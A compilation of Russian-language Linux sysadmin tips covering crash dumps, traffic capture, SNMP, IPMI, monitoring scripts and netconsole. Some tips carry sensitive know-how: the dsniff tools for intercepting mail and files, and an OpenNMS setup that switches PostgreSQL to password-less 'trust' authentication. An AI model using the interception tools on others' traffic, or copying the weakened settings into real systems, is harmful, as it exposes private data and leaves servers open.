Начиная с версии 2.6.35 в Linux-ядре появилась полезная функция "ramoops", позволяющая в случае краха сохранять информационный дамп состояния ядра в памяти для последующего анализа. Данные сохраняются только при мягкой перезагрузке, без очистки прошлого состояния памяти. Вкомпилировать данную функцию в ядро или загружать модулем "ramoops" - без разницы. Единственная хитрость - сначала нужно зарезервировать память в ядре. Сделать это можно указав ядру параметр memmap=256K@0xfc0000 (резервируем 256К перед ядром). Если ramoops в ядре, то добавляем параметры ramoops.mem_address=0xfc0000 и ramoops.mem_size=0x40000 параметр ramoops.dump_oops=1 является умолчанием, так что его можно не указывать. Для модуля "ramoops" эти параметры нужно указать при загрузке. Теперь чтобы ядро не осталось в мертвом виде, не забываем сделать echo 10 >/proc/sys/kernel/panic и (если нужно, а иногда полезно) echo 1 >/proc/sys/kernel/panic_on_oops Теперь проверяем при помощи crash-а через Alt-SysRq-C. После перезагрузки, текст crash-дампа будет лежать в памяти, начиная с адреса 0xfc0000. Достать его оттуда можно при помощи dd if=/dev/mem bs=256k skip=63 count=1 >>crash.txt либо при помощи простенькой программы, которая открывает /dev/mem и с указанного смещения читает данные. Для сохранения дампа на диск следует использовать похожую функцию mtdoops. Дополнение: Для работы в ядре необходимо выключить опцию CONFIG_STRICT_DEVMEM

Мониторинг работы устройства digium TDM Автор: bigbugkik [комментарии]

Пример решения задачи с отслеживанием отключения (зависания) карт серии digium TDM. Перед отключением карты в логе /var/log/messages появлялись сообщения "ACPI: PCI interrupt for device 0000:05:06.0 disabled" "ERROR: Unable to service card within" "Fatal Bus Error detected", Скрипт для перезапуска VoIP подсистемы в случае сбоя (в тексте "TDM800P" необходимо поменять на название своей карты): #!/bin/sh renice +19 -p $$ >/dev/null 2>&1 # проверка отключения устройства digium MSG="/var/log/messages" LAST_DISB=`grep "ERROR: Unable to service card within" $MSG | awk '{ print $2,$3 };' | tail -n1 | sed -e "s/\:/ /g"` LAST_ENBL=`grep "Found a Wildcard TDM: Wildcard TDM800P" $MSG | awk '{ print $2,$3 };' | tail -n1 | sed -e "s/\:/ /g"` for d in $LAST_DISB ; do e=`echo $LAST_ENBL | awk '{ print $1};'` if [ "$d" -gt "$e" ] ; then /bin/logger -p local0.notice -t TDM800P-monitor "restart asterisk" # грамотнее выгружать модуль zaptel а не перезапускать весь астериск renice -15 -p $$ >/dev/null 2>&1 /etc/init.d/asterisk stop renice 0 -p $$ >/dev/null 2>&1 /etc/init.d/zaptel restart /etc/init.d/asterisk start exit 0; elif [ "$d" -eq "$e" ] ; then LAST_ENBL=`echo $LAST_ENBL| sed -e "s/^$e//"` continue; else exit 0; fi done Помещаем в cron: */15 * * * * root /etc/opt/asterisk/TDM800P-monitor.sh > /dev/null 2>&1

Наблюдение за трафиком на удаленном хосте через GUI-интерфейс Wireshark (доп. ссылка 1) [комментарии]

Для наблюдения за трафиком, проходящим через сетевой интерфейс удаленной машины 192.168.1.2 в bash можно воспользоваться следующей конструкцией: wireshark -k -i <(ssh -l root 192.168.1.2 tshark -w - not tcp port 22) Конструкция "not tcp port 22" необходима для запрещения перехвата трафика передаваемого в wireshark по ssh. В других shell: mkfifo /tmp/pipe ssh user@192.168.1.2 "tshark -w - not port 22" > /tmp/pipe wireshark -k -i /tmp/pipe Если перехват в реальном времени не требуется, можно записать на удаленной машине дамп в файл: tshark -w capture.cap а потом на локальном машине выполнить операцию анализа: wireshark -k -i capture.cap

Организация приема SNMP trap’ов и их отправки на коммутаторах DLink (доп. ссылка 1) (доп. ссылка 2) Автор: Andrey Sergienko [комментарии]

В рамках поставленной задачи (узнавать о появлении новых MAC-адресов на портах коммутаторов DLink) понадобилось организовать настройку SNMP-trap'ов на коммутационном оборудовании с последующим приемом их на сервере и дальнейшей обработкой в зависимости от пришедшего события. Для начала надо установить и настроить демон, который будет принимать трапы от оборудования и при нужном MIB вызывать наш обработчик. Установка net-snmp - тема отдельная, выполняется из пактов или портов, и особых трудностей не вызывает. Собственно приемом трапов занимается snmptrapd. Для обработки заданного трапа пишем в snmptrapd.conf: traphandle 1.3.6.1.4.1.171.11.63.6.2.20.0.2 /scripts/trap.php Теперь после рестарта демона snmptrapd, он начнет принимать приходящие трапы и при наличии трапа с заданным MIB (1.3.6.1.4.1.171.11.63.6.2.20.0.2 - в нашем случае), будет вызывать наш обработчик, который уже будет совершать необходимые нам действия. Обработчик SNMP-трапов Принимать SNMP trap-ы на самом деле достаточно просто. Вот пример простого обработчика SNMP-трапов на PHP: #!/usr/bin/php -q <?php $message = ""; $fd = fopen("php://stdin", "r"); while (!feof($fd)) $message .= fread($fd, 1024); ?> Все что делает этот скрипт - получает в переменную $message текст, который передается демоном snmptrapd. Текст приходит разделенный знаками конца строки. Первая строка - это всегда имя хоста (который прислал трап), вторая - IP-адрес этого хоста, третья - его uptime, четвертая - MIB пришедшего трапа. Остальные строки в сообщении - это детальная информация касательно пришедшего трапа, если она предусмотрена. Для отправки Trap-ов на коммутаторе исполняем такие команды: create snmp community trap_com view CommunityView read_only create snmp host x.x.x.x v2c trap_com Где х.х.х.х - IP-адрес сервера, котоырй будет принимать SNMP traps. Далее надо включить опцию дабы коммутатор отсылал трап при появлении на порту нового мака. Делается это через SNMP snmpset -v2c -c write_commenity switch_ip 1.3.6.1.4.1.171.11.63.6.2.1.2.19.0 i 3 Выключить эту опцию можно так snmpset -v2c -c write_commenity switch_ip 1.3.6.1.4.1.171.11.63.6.2.1.2.19.0 i 2 Узнать текущее состояние опции можно так snmpwalk -v2c -c read_commenity switch_ip 1.3.6.1.4.1.171.11.63.6.2.1.2.19 Вся информация справедлива для коммутаторов 3028. Для других моделей MIB-ы могут сильно отличаться - к сожалению, DLink любит менять их от серии к серии. Надо заметить, что опция отправки трапа при появлении нового мака на порту доступна далеко не на всех моделях DLink-овых коммутаторов - например, 3010 такой возможности не поддерживает.

Использование протокола CDP (Cisco Discovery Protocol) в Linux (доп. ссылка 1) Автор: shadow_alone [комментарии]

Проект LLDP (http://trac.luffy.cx/lldpd/) позволяет задействовать на Linux-серверах протокол CDP (Cisco Discovery Protocol), позволяющий на Cisco посмотреть соседей с включенной CDP-командой "sh cdp nei". Команда выведет оборудование которое подключено, на каком порту и т.д., более подробно для заданного устройства параметры можно посмотреть командой "sh cdp ent Device_ID". Ниже приведен процесс настройки CDP для CentOS 5.4. Для Debian-подобных дистрибутивов принцип примерно тот же, за исключением особенностей сборки и расположения файлов. Загружаем пакет src.rpm: wget http://www.luffy.cx/lldpd/lldpd-0.4.0-1.fc10.src.rpm Установим его: rpm -Uhv lldpd-0.4.0-1.fc10.src.rpm Появится файл спецификаций /usr/src/redhat/SPECS/lldpd.spec, на основе которого выполним сборку пакета: rpmbuild -bb /usr/src/redhat/SPECS/lldpd.spec Устанавливаем вновь собранный пакет: rpm -Uhv /usr/src/redhat/RPMS/i386/lldpd-0.4.0-1.i386.rpm Настраиваем опции запуска демона, отредактировав файл /etc/sysconfig/lldpd. Правим: OPTIONS="-v -c"; где, "-v" - включаем поддержку vlan если они у Вас есть на машине с Linux "-c" - включаем протокол CDP более подробную информацию можно посмотреть в "man lldpd" Запускаем демон: /etc/init.d/lldpd start После запуска, в файле /var/log/messages мы увидим приблизительно такие строки: lldpd[30206]: lldpd_decode: switching to CDPv2 on port eth1 lldpd[30206]: lldpd_decode: switching to CDPv2 on port eth0 всё в порядке, демон запустился. Чтоб все работало, на оборудовании с другой стороны, на порту, должен быть включен CDP, то есть не должно стоять "no cdp enable" на интерфейсе. Собственно, осталось только проверить как все работает и получить информацию. lldpctl получаем: LLDP neighbors Interface: eth0 ChassisID: sw-b-48 (local) SysName: sw-b-48 SysDescr: cisco WS-C2960-48TT-L running on Cisco IOS Software, C2960 Software (C2960-LANBASE-M) Copyright (c) 1986-2007 by Cisco Systems, Inc. Compiled Thu 19-Jul-07 20:06 by nachen MgmtIP: 172.16.25.48 Caps: Bridge(E) PortID: FastEthernet0/4 (ifName) PortDescr: FastEthernet0/4 Видим , что на другой стороне у нас коммутатор C2960, версию IOS, порт коммутатора, к которому подключена машина с Linux. Для остроты ощущений, посмотрим вывод на cisco, у нас там появилось: my.linux.machine Fas 0/4 92 R Linux eth0 То есть, видим, что у нас на порту fa0/4 подключена машина с Linux, сетевое имя машины, и её сетевая карта eth0. Стоит отметить еще утилиту cdpr, но с её помощью можно только получать информацию по CDP, а не обмениваться ей, для Red Hat-подобных дистрибутивов она есть в репозитории rpmforge.

Tshark для мониторинга запросов http (доп. ссылка 1) Автор: CHAPPAY [комментарии]

Tshark из комплекта сниффера Wireshark (http://www.wireshark.org/) позволяет наглядно проследить запросы к http-серверу. Пример для интерфейса eth0: tshark -npi eth0 -f 'tcp and dst port 80' -R "http.request.method" -T fields -e ip.src -e ip.dst \ -e http.request.method -e http.host -e http.request.uri За одним можно автоматически найти имя интерфейса в Linux и удалить временные файлы, которые программа обычно забывает удалять. Для Linux: tshark -npi `netstat -rn | grep "^0.0.0.0" | awk '{ print $8 }'` \ -f 'tcp and dst port 80' -R "http.request.method" -T fields -e ip.src \ -e ip.dst -e http.request.method -e http.host -e http.request.uri rm -f /tmp/ether* Для FreeBSD: tshark -npi `netstat -rn | grep "default" | awk '{ print $6 }'` \ -f 'tcp and dst port 80' -R "http.request.method" -T fields -e ip.src \ -e ip.dst -e http.request.method -e http.host -e http.request.uri rm -f /tmp/ether* Для уменьшения нагрузки можно ограничить выборку пакетами небольшой длины, добавив "and less 600", например, "tcp and dst port 80 and less 600". Другие варианты: 1. утилита urlsnarf из состава пакета dsniff. Также можно отметить и другие похожие утилиты из данного пакета: filesnarf, mailsnarf, msgsnarf, webspy, позволяющие перехватывать почтовые сообщения, передаваемые файлы и т.п. urlsnarf -i eth0 urlsnarf -i eth1 -n .\* tcp port 80 and less 600 2. justniffer (http://justniffer.sourceforge.net/) - выводит перехваченные HTTP-пакеты в формате стандартного лога Apache: justniffer -i eth0 Позволяет оценивать время выполнения запроса: justniffer -i eth0 -a " %response.time" Выводить полный дамп HTTP-заголовков: justniffer -i eth0 -r Самостоятельно определять формат вывода: justniffer -i eth0 -l " %request.timestamp %source.ip %dest.ip %request.header.host %request.url"

Установка OpenNMS в Debian Lenny (доп. ссылка 1) Автор: Dennis Kucherskiy [комментарии]

Задача: найти и установить бесплатный аналог HP OpenView. Из всего, что удалось мне найти, максимально подошёл OpenNMS. Устанавливать буду на сервер с установленным Debian Lenny. 1. Устанавливаем SUN JDK 1.6 aptitude install sun-java6-jdk 2. Добавляем в /etc/apt/sources.list echo 'deb http://debian.opennms.org stable main' > /etc/apt/sources.list.d/opennms.list echo 'deb-src http://debian.opennms.org stable main' >> /etc/apt/sources.list.d/opennms.list 3. Импортируем PGP-ключ проекта OpenNMS wget -O - http://debian.opennms.org/OPENNMS-GPG-KEY | apt-key add - 4. Устанавливаем пакеты OpenNMS apt-get update ; apt-get install opennms 5. Настройка PostgreSQL Редактрируем файл /etc/postgresql/8.3/main/pg_hba.conf. Заменяем строки: local all all ident sameuser host all all 127.0.0.1/32 md5 host all all ::1/128 md5 на local all all trust host all all 127.0.0.1/32 trust host all all ::1/128 trust Редактируем файл /etc/postgresql/8.3/main/postgresql.conf. Необходимо раскомментировать строку: listen_addresses = 'localhost' # what IP address(es) to listen on; Перезапускаем PostgreSQL /etc/init.d/postgresql-8.3 restart 6. Создаём БД для OpenNMS sudo -u postgres createdb -U postgres -E UNICODE opennms 7. Устанавливаем OpenNMS export OPENNMS_HOME=/usr/share/opennms ; /usr/share/opennms/bin/install -dis 8. Запускаем OpenNMS /etc/init.d/opennms start 9. Запускаем браузер и вводим адрес http://your_servername:8980/opennms/. Login/Password для входа admin.

Пример конфигурирования IPMI на Linux сервере (доп. ссылка 1) Автор: Roman Sozinov [комментарии]

IPMI - интеллектуальный интерфейс управления платформой, помогающий следить (и не только) за сенсорами состояния железа на сервере (температуры, напряжения, скоростью вращения вентиляторов, состоянием источников питания и т.п.). Задача - сконфигурировать IPMI-интерфейс на сервере, с возможностью получать данные о сенсорах по сети. Операционная система RHEL/CentOS 5, сервер Intel S5000PAL. Для начала нужно установить пакеты с модулями и необходимыми утилитами: yum install OpenIPMI-tools OpenIPMI chkconfig ipmi on && service ipmi start Прежде чем приступать к конфигурированию, необходимо решить, на каком физическом сетевом адаптере сервер будет отвечать на IPMI-запросы. На языке IPMI, сетевой адаптер - это канал. Первый канал соответствует первому сетевому интерфейсу, но их mac-адреса отличаются, поэтому можно смело выбирать незанятую ip-сеть для IPMI-мониторинга и назначать выбранному каналу (сетевой плате) ip-адрес для использования IPMI. Для примера я выбрал первый канал (первую сетевую плату). ipmitool shell ipmitool> lan set 1 ipaddr 10.10.16.115 Setting LAN IP Address to 10.10.16.115 ipmitool> lan set 1 defgw ipaddr 10.10.16.254 Setting LAN Default Gateway IP to 10.10.16.254 Открываем возможность использования IPMI по сети, а также говорим, что будем использовать MD5-хэширование при аутентификации: ipmitool> lan set 1 access on ipmitool> lan set 1 auth ADMIN MD5 Создаем пользователя, включаем его и назначаем ему права администратора: ipmitool> user set name 2 monuser ipmitool> user set password 2 monpassword ipmitool> user enable 2 ipmitool> channel setaccess 1 2 ipmi=on privilege=4 ipmitool> user list 1 ID Name Enabled Callin Link Auth IPMI Msg Channel Priv Limit 2 monuser true true false true ADMINISTRATOR ipmitool> Вот так выглядит первый канал, после всех приготовлений: ipmitool> lan print 1 Set in Progress : Set Complete Auth Type Support : NONE MD5 PASSWORD Auth Type Enable : Callback : : User : : Operator : : Admin : MD5 : OEM : IP Address Source : BIOS Assigned Address IP Address : 10.10.16.115 Subnet Mask : 255.255.255.0 MAC Address : 00:04:23:dc:12:d2 SNMP Community String : IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10 BMC ARP Control : ARP Responses Enabled, Gratuitous ARP Enabled Gratituous ARP Intrvl : 2.0 seconds Default Gateway IP : 10.10.16.254 Default Gateway MAC : 00:00:00:00:00:00 Backup Gateway IP : 0.0.0.0 Backup Gateway MAC : 00:00:00:00:00:00 RMCP+ Cipher Suites : 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 Cipher Suite Priv Max : XXXXXXXXXXXXXXX : X=Cipher Suite Unused : c=CALLBACK : u=USER : o=OPERATOR : a=ADMIN : O=OEM ipmitool> Теперь с сервера мониторинга можно обращаться к IPMI-интерфейсу и забирать информацию об интересующих сенсорах: ipmitool -I lan -A MD5 -U monuser -P monpassword -H 10.10.16.115 power status Chassis Power is on ipmitool -I lan -A MD5 -U monuser -P monpassword -H 10.10.16.115 sensor BB +1.2V Vtt | 1.197 | Volts | ok | na | 1.096 | 1.134 | 1.285 | 1.323 | na И это только сбор информации, а можно и питанием удалённо управлять, в обход операционной системы, так что будьте аккуратны :) Ссылки: 1. An introduction to IPMI (http://www.mascanc.net/%7Emax/ipmi/ipmi.html) 2. Configuring and Securing IPMI on Dell PowerEdge x8xx Hardware (http://lonesysadmin.net/2005/09/23/configuring-and-securing-ipmi-on-dell-poweredge-x8xx-hardware/) 3. ipmitool manpage (http://ipmitool.sourceforge.net/manpage.html)

Мониторинг работы http-сервера Lighttpd при помощи mod_rrdtool (доп. ссылка 1) [обсудить]

Для оценки нагрузки и отладки работы http-сервера Lighttpd можно использовать входящий в комплект модуль mod_rrdtool. Устанавливаем в системе пакет rrdtool: CentOS / RHEL / Fedora yum install rrdtool Debian / Ubuntu: apt-get update && apt-get install rrdtool FreeBSD: cd /usr/ports/databases/rrdtool && make && make install Активируем в Lighttpd запись статистических данных в RRD-базу. В /etc/lighttpd/lighttpd.conf добавляем (для FreeBSD нужно поправить путь на /usr/local): server.modules += ( "mod_rrdtool" ) ### RRDTOOL Config # path to the rrdtool binary rrdtool.binary = "/usr/bin/rrdtool" # rrd database file rrdtool.db-name = "/home/lighttpd/rrd" Рестартуем http-сервер (service lighttpd reload). Для построения аналитических графиков устанавливаем скрипт lightygraph.cgi: cd /home/lighttpd/cgi-bin/ wget http://redmine.lighttpd.net/attachments/download/793 chmod +x lightygraph.cgi Открываем в браузере страницу http://ваш_домен/cgi-bin/lightygraph.cgi и смотрим графики с информацией о трафике и числе запросов.

Мониторинг аппаратных проблем в x86_64 сборке Linux (доп. ссылка 1) [комментарии]

Для мониторинга аппаратных проблем в 64-разрядных сборках Linux удобно использовать пакет mcelog, анализирующий MCE (Machine Check Exception) состояние в CPU AMD и Intel, которое может указать на проблемы с памятью и с кэшем CPU, ошибки обмена данными между CPU и чипсетом материнской платы. В RHEL / CentOS / Fedora Linux ставим нужный пакет (работает только с 64-разрядной сборкой ядра): # yum install mcelog В Debian / Ubuntu : # apt-get install mcelog Прописываем запуск mcelog в crontab для пользователя root: */5 * * * * /usr/sbin/mcelog --ignorenodev --filter >> /var/log/mcelog Проверяем лог: # tail -f /var/log/mcelog # grep -i "hardware error" /var/log/mcelog # grep -c "hardware error" /var/log/mcelog Для автоматической отправки предупреждения в случае проблем в вызов из crontab нужно добавить: [ $(grep -c "hardware error" /var/log/mcelog) -gt 0 ] && echo "Hardware Error Found $(hostname) @ $(date)" \ | mail -s 'H/w Error' pager@example.com

Просмотр байтовых счетчиков трафика на интерфейсе во FreeBSD и Linux [комментарии]

По умолчанию "netstat -i" во FreeBSD показывает только число пакетов, чтобы посмотреть размер в байтах нужно использовать опцию "-b", упоминание которой удалось найти после трех прочтений man страницы. netstat -inb Для наглядного просмотра, можно использовать опцию "-h", которая сокращает байтовый вывод до Кб, Мб или Гб. netstat -inbh Интенсивность передачи трафика удобно просматривать через: systat -ifstat или netstat -iw1 Для просмотра интенсивности передачи трафика в Linux удобно использовать команду ifstat В Linux байтовые счетчики интерфейсов можно просмотреть через: cat /proc/net/dev Другую полезную статистику по работе сетевой подсистемы можно найти в файлах /proc/net/ip_conntrack, /proc/net/stat/rt_cache, и /proc/net/stat/arp_cache.

Трассировка ввода/вывода в Linux (доп. ссылка 1) [комментарии]

Утилита blktrace (присутствует в репозиториях Ubuntu и Debian) позволяет проконтролировать какие именно данные передаются для заданного блочного устройства. Например, посмотреть общую статистику и детали обмена данными с /dev/sda можно выполнив команду: blktrace -d /dev/sda -o - | blkparse -i - где, blkparse фильтр для наглядного представления результатов. В случае вывода ошибки про отсутствие /sys/kernel/debug, убедитесь, что смонтирована debugfs: mount -t debugfs debugfs /sys/kernel/debug В качестве альтернативы можно предложить задействование механизма /proc/sys/vm/block_dump, при записи 1 в этот файл начнется сбор данных, при записи 0 - результаты будут выведены в буфер dmesg. Скрипт для упрощения разбора данных можно загрузить здесь: http://www.digitalprognosis.com/opensource/scripts/top-disk-users Мониторинг ввода/вывода не на уровне планировщика, а на уровне конечных процессов удобно проводить при помощи утилиты iotop (http://guichaz.free.fr/iotop/)

Временное ведение лога всех запросов к MySQL (доп. ссылка 1) [комментарии]

Использование опций конфигурации log-slow-queries и general_log, позволяющих вести полный лог медленных или всех запросов, требует перезапуска mysql для включения или выключения ведения логов, что неудобно в ситуации, когда нужно проанализировать запросы только в текущий момент. Для анализа запросов (не через локальный сокет) на лету можно воспользоваться сетевым сниффером. Перехватываем и записываем срез трафика MySQL в файл: tcpdump -i eth0 port 3306 -s 1500 -w tcpdump.out Выделяем из дампа SQL запросы, используя утилиту tshark из комплекта сниффера Wireshark (http://www.wireshark.org/): tshark -r tcpdump.out -d tcp.port==3306,mysql -T fields -e mysql.query > query_log.out Удаляем из полученного лога пустые и неинформативные строки: cat query_log.out | grep -vE "^(commit.*|autocommit.*|rollback.*|)$" | awk '{print $0 ";"}' > query_log_no_blank.out Полученный лог удобно анализировать утилитой mysqlsla (http://hackmysql.com/mysqlsla)

Быстрый способ посмотреть статус работы memcached (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Просмотр статуса: echo stats | nc 127.0.0.1 11211 echo stats items | nc 127.0.0.1 11211 echo stats sizes | nc 127.0.0.1 11211 echo stats slabs | nc 127.0.0.1 11211 telnet 127.0.0.1 11211 stats quit Слежение за динамикой в стиле утилиты top: watch "echo stats | nc 127.0.0.1 11211" Для тех у кого нет nc, но есть php: watch 'php -r '"'"'$m=new Memcache;$m->connect("127.0.0.1", 11211);print_r($m->getstats());'"'"

Настройка оповещения Nagios по ICQ (доп. ссылка 1) Автор: Doktor [комментарии]

Простое решение для нотификации работы серверов при помощи ICQ: 1) Ставим vicq клиент. Регистрируем для него UIN. Из примера конфигурационного файла создаем работающий конфиг. Обязательные параметры uin и password. 2) Настраиваем nagios для отсылки сообщений о проблемах: а) Задаем для своего контакта параметр pager равный номеру вашего ICQ. б) Задаем 2-е дополнительне комманды в commands.cfg # ICQ Notification define command{ command_name notify-host-by-icq command_line /usr/bin/printf "%b" "msg $CONTACTPAGER$\n***** Nagios <li>**\n\nNotification Type: $NOTIFICATIONTYPE$\nHost: $HOSTNAME$\nState: $HOSTSTATE$\nAddress: $HOSTADDRESS$\nInfo: $HOSTOUTPUT$\n\nDate/Time: $LONGDATETIME$\n.\n" | /usr/local/bin/vicq -c /usr/local/etc/vicq.conf -b -o -t 5 } define command { command_name notify-service-by-icq command_line /usr/bin/printf "msg $CONTACTPAGER$\n***** Nagios<li>**\n\nNotification Type: $NOTIFICATIONTYPE$\n\nService: $SERVICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\n\nDate/Time: $LONGDATETIME$\n\nAdditional Info:\n\n$SERVICEOUTPUT$\n.\n" | /usr/local/bin/vicq -c /usr/local/etc/vicq.conf -b -o -t 5 } в) В шаблоне описывающем generic-contact задаем следующие параметры: service_notification_commands notify-service-by-email,notify-service-by-icq host_notification_commands notify-host-by-email,notify-host-by-icq После всех манипуляций - перезагружаем Nagios и "роняем" какой-нибудь сервис. Все должно работать. Сообщения будут приходить такими: <li>** Nagios ***** Notification Type: PROBLEM Service: AMAVIS Host: localhost Address: 127.0.0.1 State: CRITICAL Date/Time: Sun Nov 2 01:22:37 MSK 2008 Additional Info: Connection refused Кстати, с vicq есть 1 баг при запуске его нагиосом. Так как клиент использует Term::Readline, то возникает ошибка при запуске: Cannot open /dev/tty for read at ... Решается проблема просто, надо подредактировать файл vicq. Перед 1063 строкой вставить следующий кусок кода: open (FH, "/dev/tty" ) or eval 'sub Term::ReadLine::findConsole { ("&STDIN", "&STDERR") }'; die $@ if $@; close (FH); Все будет работать без проблем.

Просмотр в Linux списка совместно используемых библиотек, загруженных в память [комментарии]

Утилита memstat сканирует содержимое /proc и генерирует список запущенных программ, используемых разделяемых библиотек и прочих объектов находящихся в памяти (например, шрифты, области разделяемой памяти, файлы локали), отображает занимаемую ими память, позволяет оценить степень совместного использования библиотек. Программа в Debian и Ubuntu находится в пакете memstat. При запуске, чтобы вывод не обрезался по границе экрана, нужно использовать опцию '-w'. Вывод с группировкой по библиотекам: memstat -w|grep PID|sort -k 4|less Вывод с сортировкой по размеру: memstat -w|sort -r -n -k 1|less Вывод с сортировкой по числу использующих объект процессов: memstat -w|grep -v PID| perl -ne '$a=$_;s/\d+/|/g;s/[^|]//g; print length($_)-1 . " $a";' \ |awk '{print $1 "\t" $2 "\t" $3}'|sort -n -r -k 1|less

Слежение за изменением файлов и директорий в Linux shell [комментарии]

Пакет inotify-tools содержит две полезные утилиты: inotifywait - ожидать наступления определенного события в файле или дирекотории. inotifywatch - слежение за статистикой изменений и вывод суммарных данных. Утилиту inotifywait удобно использовать в скриптах, например, когда нужно дождаться завершения внешней операции с файлом и мгновенно среагировать на изменения. Напрмер, запустим: inotifywait /tmp При попытке создать файл в /tmp утилита завершит работу, выдав: /tmp/ CREATE,ISDIR v31549 При попытке создать директорию: /tmp/ CREATE,ISDIR 0 Если необходимо следить за изменением во всех директориях в пределах /tmp, следует использовать флаг рекурсивного контроля "-r". Для больших директорий может понадобиться расширить лимит /proc/sys/fs/inotify/max_user_watches. Используя опцию "--fromfile" можно загрузить список контролируемых файлов и директорий из файла. Опция "-e" позволяет реагировать только на определенный тип события, например, на удаление файла, игнорируя создание и открытие. Опция '-m' отменяет мгновенный выход после наступления события, что позволяет организовать визуальное наблюдение или обработку в цикле. Пример, скрипта для обработки изменения файла: #!/bin/sh inotifywait -e delete -m /tmp/lock/ | while read dir events file; do echo "Removed $dir$file" done При выполнении: inotifywatch /tmp и последующем завершении выполнения через задание таймаута или нажатия ctrl+c, будет выведена суммарная информация по каждому из классов событий, напрмер: total modify close_write close_nowrite open create delete filename 22 3 4 1 5 4 5 /tmp/ Или inotifywatch -v -e access -e modify -t 60 -r /var/log через 60 секунд выдаст: 14 14 /var/log/ 2 2 /var/log/apache2 4 4 /var/log/postgresql Что касается кроссплатформенного решения, которое работает, не только в Linux, но и во FreeBSD, можно привести пример слежения за изменением файла используя Perl модуль EV (http://search.cpan.org/dist/EV/), использующий универсальную библиотеку-враппер libev: #!/usr/bin/perl use strict; use EV; # Следим за изменениями в директории /tmp/watch # 0 - интервал опроса по умолчанию my $w = EV::stat "/tmp/watch", 0, sub { my ($w, $revents) = @_; warn $w->path, " has changed somehow.".$w->attr."\n"; $w->stop; # На время обработки события, прекращаем прием нотификаций. ..... $w->start; }; EV::loop;

Пример мониторинга свободного места на диске. Автор: Hamelion [комментарии]

Наверное, все встречались, когда на том или ином разделе жесткого диска места уже нет. А иногда и просто забываешь проконтролировать место на диске. Данный скрипт написан по принципу настроил и забыл. #!/bin/sh address="root@localhost"; cicl="2 3 4 5 6"; # выставляем в процентах порог заполненного места для каждого раздела, # при котором отсылается сообщение predel[2]=80; # / predel[3]=80; # /usr predel[4]=60; # /var predel[5]=80; # /tmp predel[6]=80; # /home varning="0"; count=0; df -h > /tmp/tmp_df; while read -r FS S Ud A U MO; do let count+=1; FileSystem[$count]=$FS; Size[$count]=$S; Used[$count]=$Ud; Avail[$count]=$A; Use[$count]=$U; MountedOn[$count]=$MO; NUse[$count]=${Use[$count]%"%"}; done < /tmp/tmp_df; table=""; for c in $cicl; do if [[ ${NUse[$c]} -ge ${predel[c]} ]]; then varning="1"; table=$table"\n${FileSystem[$c]} \t${Size[$c]} \t${Used[$c]} \t${Avail[$c]} \t${Use[$c]} \t${MountedOn[$c]}"; fi done shapka="\nFileSystem \tSize \tUsed \tAvail \tUse \tMounted On"; body="Regard admin, please check, place on disk:"$shapka$table; #echo -e $body; if [ $varning -eq "1" ]; then echo -e $body | mail -s"Warning on server" $address; logger -i -p cron.warn -t dfmonitor "Send warning to $address"; else logger -i -p cron.info -t dfmonitor " Place on disk in rate"; fi P.S. записать в cron строчку: 20 5 * * * /sbin/dfmonitor, с утра приходим и получаем отчет :-)

Русские символы в rrdtool Автор: Vladimir [комментарии]

При отображении строк в RRD используется кодировка UTF-16, в которой есть таблица русских символов, соответствующая таблице CP1251, только со смещением. Чтобы rrdgraph смог отображать русские символы на графиках необходимо внести изменения в файл src/rrd_afm.h. Находим в нем строчку #define afm_fix_osx_charset(x) (x) и заменяем на #define afm_fix_osx_charset(x) \ ( (x) >= 128 && (x) <= 255 ? (x) + 0x0350 : (x)) Таким образом, если в строке встречается символ с кодом между 127 и 256, то к нему применяется смещение 0x0350. Строки необходимо записывать в CP1251 (я использую vim с libiconv). Для работы с KOI8 необходима еще таблица перестановок из KOI8 в CP1251 Для этого в файл src/rrd_afm.c добавляем описание таблицы const unsigned char afm_koi2win[128] = {128,129,130,131,132,133,134,135,136, 137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155, 156,157,158,159,160,161,162,184,164,165,166,167,168,169,170,171,172,173,174, 175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,254,224, 225,246,228,229,244,227,245,232,233,234,235,236,237,238,239,255,240,241,242, 243,230,226,252,251,231,248,253,249,247,250,222,192,193,214,196,197,212,195, 213,200,201,202,203,204,205,206,207,223,208,209,210,211,198,194,220,219,199, 216,221,217,215,218}; а в src/rrd_afm.h такие строки extern const unsigned char afm_koi2win[128]; #define afm_fix_osx_charset(c) \ ( (c) >= 128 && (c) <= 255 ? afm_koi2win[(c) - 128] + 0x0350 : (c))

Сетевая консоль для отладки зависаний Linux (доп. ссылка 1) Автор: niol, debian-administration.org [комментарии]

Модуль Linux ядра netconsole позволяет экспортировать консоль на другую машину по сети, что полезно для отладки ситуации зависания Linux без вывода диагностики в лог и на экран (например, X-ы зависли). В /etc/modprobe.d/ создаем файл или добавляем в /etc/modules.conf: options netconsole netconsole=32769@192.168.1.1/eth1,32769@192.168.1.6/01:23:34:56:78:9A где, 192.168.1.1:32769 сетевой адрес и порт на eth1 интерфейсе локальной машины, с которого будет производится отправка пакетов. 192.168.1.6:32769 сетевой адрес, порт и MAC адрес удаленной машины куда будет экспортирована консоль. На удаленной машине 192.168.1.6, для доступа к консоли используем netcat: nc -l -p 32769 -u Подгружаем модуль netconsole: modprobe netconsole

Реализация команды top на Shell Автор: rstone [комментарии]

